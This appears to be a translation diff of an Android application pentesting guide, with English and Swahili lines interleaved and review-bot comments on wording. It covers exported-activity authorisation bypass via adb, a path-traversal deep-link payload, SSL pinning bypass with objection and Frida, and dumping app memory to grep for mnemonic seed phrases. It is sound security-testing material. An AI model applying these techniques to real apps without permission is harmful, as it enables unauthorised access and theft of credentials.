Applications mara nyingi huingiza services kama Google Adsense, ambazo kwa utekelezaji mbaya zinaweza kwa bahati mbaya **leak sensitive data**. Ili kubaini potential data leaks, inashauriwa **kuintercept traffic ya application** na kuangalia kama taarifa nyeti zinatumwa kwa third-party services.
### SQLite DBs
Mengi ya applications zitaitumia **internal SQLite databases** kuhifadhi taarifa. Wakati wa pentest angalia **databases** zilizoundwa, majina ya **tables** na **columns** na data zote zilizohifadhiwa kwa kuwa unaweza kupata taarifa nyeti (ambazo zitakuwa vulnerability).\
Databases zinapaswa kuwa ziko katika `/data/data/the.package.name/databases` kama `/data/data/com.mwr.example.sieve/databases`
Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** (which would be a vulnerability).\
Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
Kama database inahifadhi taarifa za siri na ime-**encrypted** lakini unaweza **find** **password** ndani ya application, bado ni **vulnerability**.
If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**.
Orodhesha tables kwa kutumia `.tables` na orodhesha columns za table kwa kufanya `.schema <table_name>`
Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
### Drozer (Exploit Activities, Content Providers and Services)
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** inakuwezesha kuchukua nafasi ya Android app na kuingiliana na apps nyingine. Inaweza kufanya chochote ambacho installed application inaweza kufanya, kama kutumia mfumo wa Androids Inter-Process Communication (IPC) na kuingiliana na operating system ya msingi. .\
Drozer ni tool muhimu kwa **exploit exported activities, exported services and Content Providers** kama utakavyojifunza katika sehemu zifuatazo.
From [Drozer Docs](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf): **Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Androids Inter-Process Communication (IPC) mechanism and interact with the underlying operating system. .\
Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
### Exploiting exported Activities
[**Read this if you want to refresh what is an Android Activity.**](android-applications-basics.md#launcher-activity-and-other-activities)\
Pia kumbuka kuwa code ya activity inaanza katika method ya **`onCreate`**.
Also remember that the code of an activity starts in the **`onCreate`** method.
**Authorisation bypass**
Wakati Activity ime-exported unaweza kuituma screen yake kutoka app ya nje. Hivyo, kama activity yenye **sensitive information** ime-**exported** unaweza **bypass** mechanisms za **authentication** ili kuipata.
When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**
[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/index.html#activities)
Unaweza pia kuanzisha exported activity kutoka adb:
You can also start an exported activity from adb:
- PackageName is com.example.demo
- Exported ActivityName is com.example.test.MainActivity
```bash
adb shell am start -n com.example.demo/com.example.test.MainActivity
```
**NOTE**: MobSF itatambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [hii](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hili ni hatari tu kwenye toleo za zamani (API versions < 21).
**NOTE**: MobSF itakutambua kama hatari matumizi ya _**singleTask/singleInstance**_ kama `android:launchMode` katika activity, lakini kutokana na [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), inaonekana hii ni hatari tu kwenye toleo la zamani (API versions < 21).
> [!TIP]
> Kumbuka kwamba an authorisation bypass si kila mara ni udhaifu; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zilizo wazi.
> Kumbuka kwamba authorisation bypass siyo kila wakati ni vulnerability; itategemea jinsi bypass inavyofanya kazi na ni taarifa gani zinazoonekana.
**Uvuaji wa taarifa nyeti**
**Sensitive information leakage**
**Activities zinaweza pia kurudisha matokeo**. Ikiwa utafanikiwa kupata activity iliyotolewa (exported) na isiyolindwa ikiyaita method ya **`setResult`** na **kurudisha taarifa nyeti**, kuna uvuaji wa taarifa nyeti.
**Activities can also return results**. Ikiwa utafanikiwa kupata exported na unprotected activity inayoitisha method ya **`setResult`** na **kurudisha sensitive information**, kuna sensitive information leakage.
#### Tapjacking
Ikiwa tapjacking haizuiliwi, unaweza kutumia vibaya activity iliyotolewa ili kumfanya **mtumiaji afanye vitendo visivyotarajiwa**. Kwa maelezo zaidi kuhusu [**nini Tapjacking — fuata kiungo**](#tapjacking).
If tapjacking isn't prevented, unaweza kudharau exported activity kufanya **user perform unexpected actions**. Kwa habari zaidi kuhusu [**what is Tapjacking follow the link**](#tapjacking).
### Exploiting Content Providers - Kupata na kushughulikia taarifa nyeti
### Exploiting Content Providers - Kufikia na kusimamia sensitive information
[**Soma hii ikiwa unataka kukumbusha ni nini Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kawaida hutumika kwa **kushiriki data**. Ikiwa app ina content providers zinazopatikana unaweza kuwa na uwezo wa **kutoa taarifa nyeti** kutoka kwazo. Pia ni vema kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa zilizo hatarini.
[**Read this if you want to refresh what is a Content Provider.**](android-applications-basics.md#content-provider)\
Content providers kwa kawaida hutumika kushiriki data. Ikiwa app ina content providers zinapatikana unaweza kuwa na uwezo wa **extract sensitive** data kutoka kwao. Pia ni muhimu kujaribu uwezekano wa **SQL injections** na **Path Traversals** kwani zinaweza kuwa vulnerable.
[**Jifunze jinsi ya kufaida Content Providers kwa kutumia Drozer.**](drozer-tutorial/index.html#content-providers)
[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/index.html#content-providers)
### **Exploiting Services**
[**Soma hii ikiwa unataka kukumbusha ni nini Service.**](android-applications-basics.md#services)\
Kumbuka kwamba matendo ya Service huanza katika method `onStartCommand`.
[**Read this if you want to refresh what is a Service.**](android-applications-basics.md#services)\
Kumbuka kwamba vitendo vya Service huanza katika method `onStartCommand`.
Service kwa msingi ni kitu ambacho **kinapokea data**, **kuisindika** na **kurudisha** (au sio) jibu. Kwa hivyo, ikiwa application ina kutoa services, unapaswa **kagua** **code** ili kuelewa inafanya nini na **ijaribu** kivitendo (dynamically) ili kutoa taarifa za siri, bypassing hatua za uthibitisho...\
[**Jifunze jinsi ya kufaida Services kwa kutumia Drozer.**](drozer-tutorial/index.html#services)
Service kwa msingi ni kitu kinachoweza kupokea data, kuichakata na kurudisha (au la) response. Kwa hiyo, ikiwa application ina exporting services unapaswa kuangalia code ili kuelewa inafanya nini na kuipima kwa dynamically ili kutoa taarifa za siri, kupita vikwazo vya uthibitishaji...
[**Learn how to exploit Services with Drozer.**](drozer-tutorial/index.html#services)
### **Exploiting Broadcast Receivers**
[**Soma hii ikiwa unataka kukumbusha ni nini Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba matendo ya Broadcast Receiver huanza katika method `onReceive`.
[**Read this if you want to refresh what is a Broadcast Receiver.**](android-applications-basics.md#broadcast-receivers)\
Kumbuka kwamba vitendo vya Broadcast Receiver huanza katika method `onReceive`.
Broadcast receiver itakuwa ikisubiri aina fulani ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe, inaweza kuwa katika hatari.\
[**Jifunze jinsi ya kufaida Broadcast Receivers kwa kutumia Drozer.**](#exploiting-broadcast-receivers)
Broadcast receiver itakuwa inasubiri aina ya ujumbe. Kulingana na jinsi receiver inavyoshughulikia ujumbe inaweza kuwa vulnerable.\
[**Learn how to exploit Broadcast Receivers with Drozer.**](#exploiting-broadcast-receivers)
### **Exploiting Schemes / Deep links**
Unaweza kutafuta deep links kwa mkono, ukitumia zana kama MobSF au scripts kama [hii](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **fungua** scheme iliyotangazwa kwa kutumia **adb** au **kivinjari**:
Unaweza kutafuta deep links manually, kwa kutumia tools kama MobSF au scripts kama [this one](https://github.com/ashleykinguk/FBLinkBuilder/blob/master/FBLinkBuilder.py).\
Unaweza **open** declared **scheme** kwa kutumia **adb** au **browser**:
```bash
adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
```
_Kumbuka kwamba unaweza **omit the package name** na simu itaita moja kwa moja app itakayofungua kiungo hicho._
_Tambua kwamba unaweza **kuacha jina la kifurushi** na simu ya rununu itaita moja kwa moja app inayofaa kufungua kiungo hicho._
```html
<!-- Browser regular link -->
<a href="scheme://hostname/path?param=value">Click me</a>
@ -399,56 +401,56 @@ _Kumbuka kwamba unaweza **omit the package name** na simu itaita moja kwa moja a
```
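Review bot: `Wdevelopers` at the start of the Logging paragraph is a typo for `Developers`, `kuangalia_logs` has an underscore where a space belongs, and `kudharau exported activity` in the Tapjacking bullet says "disregard" where "abuse" is meant (`kutumia vibaya`, as the neighbouring line has it). `kufaida` in the three "Learn how to exploit ... with Drozer" links is not a standard verb; the page elsewhere keeps `exploit`. In the Drozer paragraph, `Androids Inter-Process Communication` needs an apostrophe and `operating system. .\` has a stray period in both versions, and `Drozer is s useful tool` drops the `a`.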
**Msimbo unaotekelezwa**
Ili kupata **msimbo utakao tekelezwa katika App**, nenda kwenye activity inayoitwa na deeplink na tafuta function **`onNewIntent`**.
Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye activity inayoitwa na the deeplink na tafuta function **`onNewIntent`**.
![](<../../images/image (436) (1) (1) (1).png>)
**Taarifa nyeti**
Kila wakati unapokutana na deep link hakikisha haipokei data nyeti (kama passwords) kupitia URL parameters, kwa sababu programu nyingine yoyote inaweza kujifanya deep link na kuiba data hiyo!
Kila unapokutana na deep link hakikisha kwamba **haipokei data nyeti (kama passwords) kupitia vigezo vya URL**, kwa sababu programu nyingine yoyote inaweza **kuiga deep link na kuiba data hiyo!**
**Parameters in path**
**Vigezo katika path**
Lazima pia ukague ikiwa deep link yoyote inatumia parameter ndani ya path ya URL kama: `https://api.example.com/v1/users/{username}` , katika kesi hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Note that if you find the correct endpoints inside the application you may be able to cause a **Open Redirect** (if part of the path is used as domain name), **account takeover** (if you can modify users details without CSRF token and the vuln endpoint used the correct method) and any other vuln. More [info about this here](http://dphoeniixx.com/2020/12/13-2/).
Unapaswa pia **kuhakiki kama deep link yoyote inatumia parameter ndani ya path** ya URL kama: `https://api.example.com/v1/users/{username}` , katika hali hiyo unaweza kulazimisha path traversal kwa kufikia kitu kama: `example://app/users?username=../../unwanted-endpoint%3fparam=value` .\
Kumbuka kwamba ukipata endpoints sahihi ndani ya application unaweza kusababisha **Open Redirect** (ikiwa sehemu ya path inatumika kama domain name), **account takeover** (ikiwa unaweza kubadilisha maelezo ya watumiaji bila CSRF token na endpoint iliyo na udhaifu ilitumia method sahihi) na udhaifu mwingine wowote. Habari zaidi [hapa](http://dphoeniixx.com/2020/12/13-2/).
**Mifano zaidi**
Ripoti ya bug bounty yenye kuvutia: [interesting bug bounty report](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
Ripoti ya bug bounty yenye kuvutia: [https://hackerone.com/reports/855618](https://hackerone.com/reports/855618) kuhusu links (_/.well-known/assetlinks.json_).
### Uchunguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
### Ukaguzi wa Transport Layer na Kushindwa kwa Uthibitishaji
- **Certificates are not always inspected properly** na applications za Android. Mara nyingi hizi applications hupuuza onyo na kukubali self-signed certificates au, katika matukio mengine, kurudi kutumia muunganisho wa HTTP.
- **Negotiations during the SSL/TLS handshake are sometimes weak**, zikitumia insecure cipher suites. Utaifu huu hufanya muunganisho uwe nyeti kwa man-in-the-middle (MITM) attacks, ukiruhusu mshambuliaji ku-decrypt data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha watumiaji kwa kutumia channel salama lakini kisha kuwasiliana kwa channels zisizo salama kwa miamala mingine. Mbinu hii hailindi data nyeti, kama session cookies au maelezo ya mtumiaji, dhidi ya interception na wahalifu.
- **Vyeti mara nyingi havikaguliwi ipasavyo** na applications za Android. Ni kawaida kwa applications hizi kupuuza onyo na kukubali self-signed certificates au, katika baadhi ya matukio, kurudi kutumia HTTP connections.
- **Mazungumzo wakati wa SSL/TLS handshake mara nyingine huwa dhaifu**, kwa kutumia insecure cipher suites. Udhaifu huu unafanya muunganisho uwe hatarini kwa man-in-the-middle (MITM) attacks, ukiruhusu wadukuzi kufungua encryption ya data.
- **Leakage of private information** ni hatari wakati applications zinathibitisha kwa kutumia channels salama lakini kisha zinasiliana kwa channels zisizo salama kwa ajili ya miamala mingine. Njia hii inashindwa kulinda data nyeti, kama session cookies au maelezo ya watumiaji, dhidi ya kukamatwa na wahalifu.
#### Certificate Verification
#### Uhakiki wa vyeti
Tutalenga kwenye **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu usanidi wa TLS usio salama na kusafirisha data nyeti kupitia channels zisizo-simbwa kunaweza kusababisha hatari kubwa. Kwa hatua za kina juu ya kuthibitisha certificates za server na kushughulikia udhaifu, [**this resource**](https://manifestsecurity.com/android-application-security-part-10/) inatoa mwongozo kamili.
Tutatilia maanani **certificate verification**. Uadilifu wa certificate ya server lazima uthibitishwe ili kuongeza usalama. Hii ni muhimu kwa sababu TLS configurations zisizo salama na uhamishaji wa data nyeti kupitia channels zisizo encrypted vinaweza kuleta hatari kubwa. Kwa hatua za kina juu ya jinsi ya kuthibitisha server certificates na kushughulikia udhaifu, rasilimali hii [**inatoa mwanga**](https://manifestsecurity.com/android-application-security-part-10/).
#### SSL Pinning
SSL Pinning ni hatua ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Njia hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunapendekezwa kwa nguvu kwa applications zinazoshughulikia taarifa nyeti.
SSL Pinning ni tahadhari ya usalama ambapo application inathibitisha certificate ya server dhidi ya nakala inayojulikana iliyohifadhiwa ndani ya application yenyewe. Mbinu hii ni muhimu kuzuia MITM attacks. Kutekeleza SSL Pinning kunashauriwa kwa nguvu kwa applications zinazosimamia taarifa nyeti.
#### Traffic Inspection
#### Ukaguzi wa Traffic
Ili kuchunguza trafiki ya HTTP, ni muhimu **kusakinisha certificate ya proxy tool** (mfano, Burp). Bila kusakinisha certificate hii, trafiki iliyosimbwa huenda isiweze kuonekana kupitia proxy. Kwa mwongozo wa kusakinisha custom CA certificate, [**click here**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Ili kuchambua HTTP traffic, ni lazima **usakinishe certificate ya chombo cha proxy** (mfano, Burp). Bila kusakinisha certificate hii, traffic iliyosimbwa inaweza isionewe kupitia proxy. Kwa mwongozo wa jinsi ya kusakinisha custom CA certificate, [**bofya hapa**](avd-android-virtual-device.md#install-burp-certificate-on-a-virtual-machine).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali proxy's CA certificate. Hatua hii ni muhimu kwa kuchunguza trafiki iliyosimbwa. Kwa maelekezo juu ya kubadilisha Network Security Config, [**refer to this tutorial**](make-apk-accept-ca-certificate.md).
Applications zinazolenga **API Level 24 and above** zinahitaji mabadiliko kwenye Network Security Config ili kukubali CA certificate ya proxy. Hatua hii ni muhimu kwa kuchambua traffic iliyosimbwa. Kwa maelekezo ya jinsi ya kubadilisha Network Security Config, [**rejea mwongozo huu**](make-apk-accept-ca-certificate.md).
If **Flutter** is being used you need to to follow the instructions in [**this page**](flutter.md). This is becasue, just adding the certificate into the store won't work as Flutter has its own list of valid CAs.
Ikiwa **Flutter** inatumika unahitaji kufuata maelekezo kwenye [**ukurasa huu**](flutter.md). Hii ni kwa sababu, kuongeza certificate kwenye store peke yake haitafanya kazi kwani Flutter ina orodha yake ya CAs zinazokubalika.
#### Static detection of SSL/TLS pinning
#### Utambuzi wa static wa SSL/TLS pinning
Kabla ya kujaribu runtime bypasses, ramani kwa haraka sehemu ambako pinning inatekelezwa katika APK. Ugunduzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Kabla ya kujaribu runtime bypasses, panga haraka maeneo ambapo pinning inatekelezwa katika APK. Utambuzi wa static utakusaidia kupanga hooks/patches na kuzingatia code paths sahihi.
Tool: SSLPinDetect
- Open-source static-analysis utility that decompiles the APK to Smali (via apktool) and scans for curated regex patterns of SSL/TLS pinning implementations.
- Reports exact file path, line number, and a code snippet for each match.
- Covers common frameworks and custom code paths: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, and Network Security Config XML pins.
- Open-source static-analysis utility inayofanya decompile ya APK hadi Smali (kupitia apktool) na kutafuta curated regex patterns za utekelezaji wa SSL/TLS pinning.
- Inaripoti path ya faili kwa usahihi, nambari ya mstari, na kipande cha code kwa kila match.
- Inafunika frameworks za kawaida na code paths za custom: OkHttp CertificatePinner, custom javax.net.ssl.X509TrustManager.checkServerTrusted, SSLContext.init with custom TrustManagers/KeyManagers, na Network Security Config XML pins.
Sakinisha
- Mahitaji ya awali: Python >= 3.8, Java on PATH, apktool
- Masharti ya awali: Python >= 3.8, Java on PATH, apktool
```bash
git clone https://github.com/aancw/SSLPinDetect
cd SSLPinDetect
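Review bot: the rewritten line "Ili kupata **msimbo utakaotekelezwa katika App**, nenda kwenye activity inayoitwa na the deeplink na tafuta function **`onNewIntent`**." keeps a stray English article; drop "the" so it reads "inayoitwa na deeplink". Also in this hunk, the SSLPinDetect bullet "Inaripoti path ya faili kwa usahihi, nambari ya mstari, na kipande cha code kwa kila match" turns "exact file path" into "reports the file path accurately"; "Inaripoti path kamili ya faili, nambari ya mstari, na kipande cha code kwa kila match" keeps the original meaning.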
@ -462,8 +464,9 @@ python sslpindetect.py -f app.apk -a apktool.jar
# Verbose (timings + per-match path:line + snippet)
python sslpindetect.py -a apktool_2.11.0.jar -f sample/app-release.apk -v
```
Mifano ya kanuni za pattern (JSON)
Tumia au ongeza signatures ili kutambua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na scan kwa kiwango kikubwa.
Mifano ya sheria za muundo (JSON)
Tumia au panua signatures ili kugundua proprietary/custom pinning styles. Unaweza kupakia JSON yako mwenyewe na kutafuta kwa wingi.
```json
{
"OkHttp Certificate Pinning": [
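Review bot: "Mifano ya sheria za muundo (JSON)" translates "pattern" as "muundo", while the rest of this section keeps "pattern" as an untranslated technical term ("curated regex patterns", "Pattern collection", the smali-sslpin-patterns repo, the JSON keys); keep it here too, e.g. "Mifano ya sheria za pattern (JSON)", so readers can match the heading to the JSON that follows.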
@ -477,41 +480,43 @@ Tumia au ongeza signatures ili kutambua proprietary/custom pinning styles. Unawe
]
}
```
Vidokezo na ushauri
- Kukagua kwa haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; pre-compiled regex hupunguza overhead/false positives.
- Mkusanyiko wa pattern: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi ya kuchunguza baadae:
- OkHttp: matumizi ya CertificatePinner, setCertificatePinner, okhttp3/okhttp package references
- TrustManagers maalum: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
Notes and tips
- Skanning ya haraka kwenye apps kubwa kupitia multi-threading na memory-mapped I/O; regex zilizo pre-compiled hupunguza mzigo/matokeo ya uwongo.
- Pattern collection: https://github.com/aancw/smali-sslpin-patterns
- Malengo ya kawaida ya utambuzi kwa kuchambua ifuatayo:
- OkHttp: CertificatePinner usage, setCertificatePinner, okhttp3/okhttp package references
- Custom TrustManagers: javax.net.ssl.X509TrustManager, checkServerTrusted overrides
- Custom SSL contexts: SSLContext.getInstance + SSLContext.init with custom managers
- Declarative pins katika res/xml network security config na manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au config reviews kabla ya dynamic testing.
- Declarative pins in res/xml network security config and manifest references
- Tumia maeneo yaliyolingana kupanga Frida hooks, static patches, au mapitio ya config kabla ya majaribio ya dynamic.
#### Kupitisha SSL Pinning
Wakati SSL Pinning imewekwa, kuipita kunakuwa muhimu ili kuchunguza trafiki ya HTTPS. Mbinu mbalimbali zinapatikana kwa madhumuni haya:
- Kiotomatiki **badilisha** the **apk** ili **kupitisha** SSLPinning kwa kutumia [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). Faida kubwa ya chaguo hili ni kwamba hautahitaji root kupitisha SSL Pinning, lakini utalazimika kufuta application na kuisakinisha upya, na hii haitafanya kazi kila mara.
- Unaweza kutumia **Frida** (discussed below) kupitisha ulinzi huu. Hapa kuna mwongozo wa kutumia Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- Unaweza pia kujaribu **kuipita kiotomatiki SSL Pinning** kutumia [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- Unaweza pia kujaribu **kuipita kiotomatiki SSL Pinning** kwa kutumia **MobSF dynamic analysis** (explained below)
- Ikiwa bado unaona kuna trafiki ambayo hauiangalii unaweza kujaribu **kupeleka trafiki kwa burp kwa kutumia iptables**. Soma blogu hii: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Bypassing SSL Pinning
#### Kutafuta udhaifu wa wavuti wa kawaida
When SSL Pinning is implemented, bypassing it becomes necessary to inspect HTTPS traffic. Various methods are available for this purpose:
Ni muhimu pia kutafuta udhaifu wa wavuti wa kawaida ndani ya application. Maelezo ya kina juu ya kutambua na kupunguza udhaifu haya yapita upeo wa muhtasari huu lakini yameelezewa kwa undani mahali pengine.
- Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
- You could use **Frida** (discussed below) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
- You can also try to **automatically bypass SSL Pinning** using [**objection**](frida-tutorial/objection-tutorial.md)**:** `objection --gadget com.package.app explore --startup-command "android sslpinning disable"`
- You can also try to **automatically bypass SSL Pinning** using **MobSF dynamic analysis** (explained below)
- If you still think that there is some traffic that you aren't capturing you can try to **forward the traffic to burp using iptables**. Read this blog: [https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62](https://infosecwriteups.com/bypass-ssl-pinning-with-ip-forwarding-iptables-568171b52b62)
#### Looking for Common Web Vulnerabilities
Ni muhimu pia kutafuta vulnerabilities za kawaida za web ndani ya application. Maelezo ya kina juu ya utambuzi na kupunguza vulnerabilities hizi hayamo katika muhtasari huu lakini yameelezwa kwa kina mahali pengine.
### Frida
[Frida](https://www.frida.re) ni dynamic instrumentation toolkit kwa developers, reverse-engineers, na security researchers.\
**Unaweza kupata running application na ku-hook methods wakati wa runtime kubadilisha tabia, badilisha values, extract values, run different code...**\
Ikiwa unataka pentest Android applications lazima ujue jinsi ya kutumia Frida.
[Frida](https://www.frida.re) is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.\
**Unaweza kufikia application inayokimbia na ku-hook methods wakati wa runtime ili kubadilisha tabia, kubadilisha values, kutoa values, kuendesha code tofauti...**\
Kama unataka pentest Android applications ni muhimu ujue jinsi ya kutumia Frida.
- Jifunze jinsi ya kutumia Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Baadhi ya "GUI" kwa vitendo na Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection ni nzuri ku-automate matumizi ya Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- Unaweza kupata baadhi ya Awesome Frida scripts hapa: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Jaribu kupitisha anti-debugging / anti-frida mechanisms kwa kupakia Frida kama inavyoelezwa katika [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
- Learn how to use Frida: [**Frida tutorial**](frida-tutorial/index.html)
- Some "GUI" for actions with Frida: [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)
- Ojection is great to automate the use of Frida: [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)
- You can find some Awesome Frida scripts here: [**https://codeshare.frida.re/**](https://codeshare.frida.re)
- Try to bypass anti-debugging / anti-frida mechanisms loading Frida as in indicated in [https://erfur.github.io/blog/dev/code-injection-without-ptrace](https://erfur.github.io/blog/dev/code-injection-without-ptrace) (tool [linjector](https://github.com/erfur/linjector-rs))
#### Anti-instrumentation & SSL pinning bypass workflow
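Review bot: several replacement lines in this hunk swap existing Swahili for untranslated English, which reverses the direction of the commit: "Notes and tips" replaces "Vidokezo na ushauri", "Pattern collection:" replaces "Mkusanyiko wa pattern", "Declarative pins in res/xml network security config and manifest references" replaces the translated bullet, the whole "#### Bypassing SSL Pinning" block ("When SSL Pinning is implemented, bypassing it becomes necessary ..." and its five bullets) replaces the already translated "#### Kupitisha SSL Pinning" block, "#### Looking for Common Web Vulnerabilities" replaces "#### Kutafuta udhaifu wa wavuti wa kawaida", and the Frida intro line plus the five Frida bullets ("Learn how to use Frida", "Some "GUI" for actions with Frida", ...) replace their Swahili versions. Keep the existing Swahili lines for those spans, or re-translate them, before merging. Two upstream typos survive in both versions and could be fixed while here: "Ojection" for "Objection" in the Frida bullet list, and "as in indicated" in the anti-debugging bullet.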
@ -521,9 +526,9 @@ android-anti-instrumentation-and-ssl-pinning-bypass.md
### **Dump Memory - Fridump**
Angalia kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama vile passwords au mnemonics.
Kagua kama application inahifadhi taarifa nyeti ndani ya memory ambazo haipaswi kuhifadhi, kama passwords au mnemonics.
Kutumia [**Fridump3**](https://github.com/rootbsd/fridump3) unaweza dump memory ya app kwa:
Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:
```bash
# With PID
python3 fridump3.py -u <PID>
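Review bot: "Using [**Fridump3**](https://github.com/rootbsd/fridump3) you can dump the memory of the app with:" replaces the translated "Kutumia [**Fridump3**](...) unaweza dump memory ya app kwa:" with the English original; keep the Swahili line.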
@ -532,15 +537,15 @@ python3 fridump3.py -u <PID>
frida-ps -Uai
python3 fridump3.py -u "<Name>"
```
Hii itadump memory katika folda ./dump, na ndani yake unaweza kufanya grep kwa kitu kama:
Hii ita-dump kumbukumbu katika folda ./dump, na hapo unaweza kutumia grep kwa kitu kama:
```bash
strings * | grep -E "^[a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+ [a-z]+$"
```
### **Data nyeti katika Keystore**
### **Taarifa nyeti katika Keystore**
Katika Android Keystore ni mahali bora zaidi pa kuhifadhi data nyeti, hata hivyo, kwa vibali vya kutosha bado ni **inawezekana kuipata**. Kwa kuwa apps huenda zikahifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuangalia hili kama root user au mtu mwenye ufikiaji wa kimwili wa kifaa anaweza kuiba data hii.
Katika Android Keystore ni mahali pazuri zaidi pa kuhifadhi taarifa nyeti, hata hivyo, kwa idhini za kutosha bado ni **possible to access it**. Kwa kuwa applications mara nyingi huzihifadhi hapa **sensitive data in clear text**, pentests zinapaswa kuichunguza kwani kama root user au mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii.
Hata kama app imehifadhi data katika keystore, data hiyo inapaswa kuwa imefungwa kwa usimbaji.
Hata kama app imehifadhi data kwenye keystore, data inapaswa kuwa encrypted.
Ili kufikia data ndani ya keystore unaweza kutumia Frida script hii: [https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js](https://github.com/WithSecureLabs/android-keystore-audit/blob/master/frida-scripts/tracer-cipher.js)
```bash
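Review bot: the rewritten Keystore paragraph reads "pentests zinapaswa kuichunguza kwani kama root user au mtu mwenye ufikiaji wa kimwili kwa kifaa anaweza kuiba data hii", where "kwani kama" makes the clause ungrammatical; the earlier "pentests zinapaswa kuangalia hili kama root user au mtu mwenye ufikiaji wa kimwili wa kifaa anaweza kuiba data hii" is clearer. The same line also leaves "possible to access it" in English inside the Swahili sentence where the previous version had "inawezekana kuipata".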
@ -548,47 +553,47 @@ frida -U -f com.example.app -l frida-scripts/tracer-cipher.js
```
### **Fingerprint/Biometrics Bypass**
Kwa kutumia Frida script ifuatayo inaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kutumia ili **kulinda maeneo maalum nyeti:**
Kutumia Frida script ifuatayo kunaweza kuwa inawezekana **bypass fingerprint authentication** ambayo Android applications zinaweza kufanya ili **kulinda maeneo fulani nyeti:**
```bash
